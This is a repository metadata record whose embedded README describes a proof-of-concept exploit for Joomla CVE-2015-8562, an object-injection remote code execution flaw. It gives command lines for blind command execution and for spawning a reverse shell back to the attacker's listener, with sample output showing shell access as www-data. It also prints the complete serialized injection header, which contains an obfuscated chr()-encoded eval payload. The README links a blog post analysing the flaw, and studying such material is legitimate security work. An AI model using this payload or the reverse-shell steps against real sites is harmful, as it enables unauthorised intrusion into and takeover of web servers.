{"id":21516430,"url":"https://github.com/voidsec/joomla_cve-2015-8562","last_synced_at":"2025-04-09T20:42:50.027Z","repository":{"id":74148310,"uuid":"103837776","full_name":"VoidSec/Joomla_CVE-2015-8562","owner":"VoidSec","description":"A proof of concept for Joomla's CVE-2015-8562 vulnerability (Object Injection RCE)","archived":false,"fork":false,"pushed_at":"2024-05-03T23:16:36.000Z","size":10,"stargazers_count":9,"open_issues_count":1,"forks_count":8,"subscribers_count":3,"default_branch":"master","last_synced_at":"2025-03-23T22:38:08.612Z","etag":null,"topics":["cve-2015-8562","exploit","joomla","php","rce","vulnerability"],"latest_commit_sha":null,"homepage":"https://voidsec.com/analysis-of-the-joomla-rce-cve-2015-8562/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/VoidSec.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2017-09-17T15:03:53.000Z","updated_at":"2025-01-08T20:16:22.000Z","dependencies_parsed_at":null,"dependency_job_id":"fddbc3c0-d973-4e02-b617-06b71c099c7a","html_url":"https://github.com/VoidSec/Joomla_CVE-2015-8562","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/VoidSec%2FJoomla_CVE-2015-8562","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/VoidSec%2FJoomla_CVE-2015-8562/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/VoidSec%2FJoomla_CVE-2015-8562/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/VoidSec%2FJoomla_CVE-2015-8562/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/VoidSec","download_url":"https://codeload.github.com/VoidSec/Joomla_CVE-2015-8562/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248110207,"owners_count":21049452,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cve-2015-8562","exploit","joomla","php","rce","vulnerability"],"created_at":"2024-11-24T00:21:08.897Z","updated_at":"2025-04-09T20:42:50.019Z","avatar_url":"https://github.com/VoidSec.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Joomla_CVE-2015-8562\nA proof of concept for Joomla's CVE-2015-8562 vulnerability (Object Injection RCE)\n\n## Intro/Changelog\n\nThis PoC is the second version of the implementation hosted at [exploit-db](https://www.exploit-db.com/exploits/39033/).\n\n    -Fixed (regenerate session)\n    -Added the option to switch from X-Forwarded-For to User-Agent method\n    -Added the option to switch from a python reverse shell to a bash one\n    -Added catching exception for missing http schema and script termination\n    -Edited for a better usage, better messages and colors\n    -TODO: adding msf support\n\n## How to Use\n\n    git clone https://github.com/VoidSec/Joomla_CVE-2015-8562.git\n    cd Joomla_CVE-2015-8562\n\nBlind RCE:\n\n    python joomla-cve-2015-8562.py -t http://\u003ctarget_ip\u003e/ --cmd\n    $ touch /tmp/test\n    \nSpawn Reverse Shell:\n  \n    python joomla-cve-2015-8562.py -t http://\u003ctarget_ip\u003e/ -l \u003clocal_ip\u003e -p \u003clocal_port\u003e\n    [-] Attempting to exploit Joomla RCE (CVE-2015-8562) on: http://\u003ctarget_ip\u003e/\n    [-] Uploading python reverse shell\n    \u003cResponse [200]\u003e\n    [+] Spawning reverse shell....\n    \u003cResponse [200]\u003e\n    Listening on [0.0.0.0] (family 0, port 1337)\n    $ id\n    uid=33(www-data) gid=33(www-data) groups=33(www-data)\n\n\n### CVE-2015-8562\n\nIn December 2015 a new vulnerability was found in Joomla. It allows a remote attacker to exploit PHP object injection attacks and execute arbitrary PHP code via the HTTP User-Agent header.\n\nThis vulnerability target Joomla 1.5.0 through 3.4.5 and PHP version before 5.4.45 (including 5.3.x), 5.5.29 or 5.6.13 [CVE-2015-6835](https://bugs.php.net/bug.php?id=70219). \n\nI've made this [blog post](https://voidsec.com/analysis-of-the-joomla-rce-cve-2015-8562/) explaining the vulnerability.\n\n#### This is what the sent header looks like\n```\n}__test|O:21:\"JDatabaseDriverMysqli\":3:{\n\ts:2:\"fc\";\n\tO:17:\"JSimplepieFactory\":0:{}\n\ts:21:\"\\0\\0\\0disconnectHandlers\";\n\ta:1:{\n\t\ti:0;\n\t\ta:2:{\n\t\t\ti:0;\n\t\t\tO:9:\"SimplePie\":5:{\n\t\t\t\ts:8:\"sanitize\";\n\t\t\t\tO:20:\"JDatabaseDriverMysql\":0:{}\n\t\t\t\ts:8:\"feed_url\";\n\t\t\t\ts:305:\"eval(chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).chr(39).chr(112).chr(121).chr(116).chr(104).chr(111).chr(110).chr(32).chr(47).chr(116).chr(109).chr(112).chr(47).chr(76).chr(56).chr(51).chr(55).chr(66).chr(72).chr(46).chr(112).chr(121).chr(39).chr(41).chr(59));\n\t\t\t\tJFactory::getConfig();\n\t\t\t\texit\";\n\t\t\t\ts:19:\"cache_name_function\";\n\t\t\t\ts:6:\"assert\";\n\t\t\t\ts:5:\"cache\";\n\t\t\t\tb:1;s:11:\"cache_class\";\n\t\t\t\tO:20:\"JDatabaseDriverMysql\":0:{}\n\t\t\t\t}\n\t\t\ti:1;\n\t\t\ts:4:\"init\";\n\t\t\t}\n\t\t}\n\ts:13:\"\\0\\0\\0connection\";\n\tb:1;\n}ýýýý\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fvoidsec%2Fjoomla_cve-2015-8562","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fvoidsec%2Fjoomla_cve-2015-8562","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fvoidsec%2Fjoomla_cve-2015-8562/lists"}